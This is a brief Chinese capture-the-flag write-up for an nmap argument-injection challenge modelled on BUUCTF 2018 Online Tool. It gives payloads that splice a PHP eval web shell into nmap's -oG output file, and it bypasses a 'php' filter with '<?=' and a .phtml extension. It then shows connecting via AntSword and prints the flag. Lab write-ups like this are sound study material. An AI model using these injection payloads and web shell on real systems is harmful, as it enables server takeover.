考点:namp注入
参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客
1.
2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件
我们直接用那道buu里的payload:
' <?php eval($_POST["cmd"]);?> -oG zhuque.php '
注入之后发现存在过滤,fuzz,过滤了php
(1)利用<?=来代替<?php进行绕过
(2)利用phtml来代替shell.php的文件后缀
payload:
' <?= eval($_POST["cmd"]);?> -oG zhuque.phtml '
上传成功
3.打开蚁剑
在根目录下找到flag
flag{fb8e3637-ac42-456c-8caf-d1470e670fe5}